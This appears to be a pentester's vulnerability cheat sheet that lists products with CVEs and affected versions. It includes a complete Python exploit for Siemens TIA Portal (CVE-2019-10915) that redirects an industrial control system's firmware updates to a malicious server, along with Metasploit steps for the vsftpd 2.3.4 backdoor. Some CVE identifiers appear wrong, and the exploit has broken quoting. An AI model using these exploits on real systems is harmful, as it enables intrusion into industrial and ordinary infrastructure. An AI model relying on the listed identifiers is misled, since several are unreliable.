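HFS (file sharing)
HFS remote command execution

phpmyadmin (MySQL database administration tool)
phpmyadmin weak password

phpmoadmin (MongoDB administration tool)
phpmoadmin remote code execution

Elasticsearch (search server)
Elasticsearch remote command execution
Elasticsearch unauthorized access vulnerability
Elasticsearch arbitrary file read

openssl (SSL toolkit)
Affected versions include: OpenSSL 1.0.1 through 1.0.1g; OpenSSL 1.0.0 through 1.0.0l; all versions before OpenSSL 0.9.8y
DROWN attack vulnerability (CVE-2016-0800)
CCS injection vulnerability

Kubernetes
Affected versions: Kubernetes v1.0.x-1.9.x; Kubernetes v1.10.0-1.10.10 (fixed in v1.10.11); Kubernetes v1.11.0-1.11.4 (fixed in v1.11.5); Kubernetes v1.12.0-1.12.2 (fixed in v1.12.3)
Kubernetes privilege escalation vulnerability (CVE-2018-1002105)

axis2
axis2 weak password
axis2 arbitrary file read

zabbix
Affected versions: 2.2.x; 3.3.0-3.03
zabbix latest SQL injection vulnerability
zabbix jsrpc SQL injection vulnerability

activemq (middleware)
activemq admin console weak password vulnerability
activemq remote command execution
activemq arbitrary file upload vulnerability
ActiveMQ physical path disclosure vulnerability
ActiveMQ arbitrary file move vulnerability (Apache ActiveMQ 5.x ~ 5.14.0)
ActiveMQ deserialization vulnerability (CVE-2015-5254), port 61616 (ActiveMQ message queue port); versions before Apache ActiveMQ 5.13.0 contain the deserialization vulnerability
ActiveMQ information disclosure vulnerability (CVE-2017-15709) (Apache ActiveMQ 5.14.0 – 5.15.2)

Openssh (Open Secure Shell (openssh) is a secure login system that can be used in place of telnet, rlogin, rcp and similar tools)

libssh (SSH toolkit)
Affected versions: libssh 0.8.x - 0.8.3; libssh 0.7.x - 0.7.5; libssh 0.6.x
CVE-2018-10933 libssh authentication bypass vulnerability

grafana (Grafana is a cross-platform, open-source metrics analysis and visualization tool; it queries collected data, displays it visually, and sends timely notifications)
grafana weak password

hudson (Hudson is the predecessor of Jenkins; both are Java-based continuous integration tools)
hudson code disclosure vulnerability

apache mod_jk
apache mod_jk access control bypass vulnerability (CVE-2018-11759)

node.js v8 debugger
node.js v8 debugger remote command execution

Fckeditor
https://www.jianshu.com/p/b0295978da77
/fckeditor/editor/dialog/fck_about.html
/FCKeditor/_whatsnew.html
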
Openssh
CVE-2015-5600
CVE-2016-6515
CVE-2014-1692
CVE-2010-4478
CVE-2016-10009
CVE-2016-1908
CVE-2015-8325
CVE-2016-10012
CVE-2016-10010 (privilege escalation)
Atlassian
CVE-2019-1158
docker
CVE-2018-15664
Siemens TIA Portal (STEP7) RCE : CVE-2019-10915
    ##
    # Exploit Title: Siemens TIA Portal remote command execution
    # Date: 06/11/2019
    # Exploit Author: Joseph Bingham
    # CVE : CVE-2019-10915
    # Advisory: https://www.tenable.com/security/research/tra-2019-33
    # Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a
    # Affected Vendors/Device/Firmware:
    # - Siemens STEP7 / TIA Portal
    ##

    ##
    # Example usage
    # $ python cve_2019_10915_tia_portal_rce.py
    # Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'
    # Received '40'
    # Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'
    ##

    import websocket, ssl, argparse

    parser = argparse.ArgumentParser()
    parser.add_argument("target_host", help="TIA Portal host")
    parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int)
    parser.add_argument("update_server", help="Malicious firmware update server IP")
    args = parser.parse_args()

    host = args.target_host
    port = args.target_port
    updatesrv = args.update_server
    ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={ "cert_reqs": ssl.CERT_NONE})
    #req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'
    #req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'
    req = 42["cli2serv",{ "moduleFunc":"SoftwareModule.saveUrlSettings","data":{ "ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'
    ws.send(req)

    result = ws.recv()
    print("Received '%s'" % result)

    result = ws.recv()
    print("Received '%s'" % result)

    result = ws.recv()
    print("Received '%s'" % result)
WinRAR
CVE-2018-2025(WinRAR RCE)
Affected range:
WinRAR < 5.70 Beta 1
Bandizip <= 6.2.0.0
HaoZip (2345 compression) <= 5.9.8.10907
360 Zip <= 4.0.0.1170
ghostscript
Affected versions: <= 9.23 (all versions, all platforms)
CVE-2017-8291
Ghostscript < 2017-04-26
Flash
CVE-2018-4878
Project URL: https://github.com/Sch01ar/CVE-2018-4878.git
Affected versions: Adobe Flash Player <= 28.0.0.137
Office
CVE-2017-11882(RCE)
Affected versions:
Office 365
Microsoft Office 2000
Microsoft Office 2003
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
vsftpd
vsftpd 2.3.4 - "smiley face" vulnerability

    msfconsole
    search vsftpd
    use exploit/unix/ftp/vsftpd_234_backdoor
    set rhost IP
    run
memcache
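Common port: 11211
Unauthorized access
memcache DRDoS vulnerability (B6-2018-030102)
Memcached Append/prepend remote code execution vulnerability (CVE-2016-8704), version 1.4.31
Memcache Update remote code execution vulnerability (CVE-2016-8705), version 1.4.31
Memcache SASL authentication remote code execution vulnerability (CVE-2016-8706), version 1.4.31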
jenkins
Common port: 8080
Unauthorized access
Deserialization
CVE-2017-1000353
CVE-2018-1999002
GeoServer
1. Weak password
Javascript is required to actually use the GeoServer admin console. - the site has not been added to the trusted sites
2. XXE (versions earlier than 2.7.1.1)
ccproxy
ccproxy 6.0 remote overflow
solr
Unauthorized access
CVE-2017-12629 XXE & RCE
CVE-2019-0193 RCE
FasterXML
Jackson-databind CVE-2019-12384 (RCE)
Affected versions: Jackson-databind 2.X < 2.9.9.1
Unaffected versions: Jackson-databind 2.9.9.1, Jackson-databind 2.10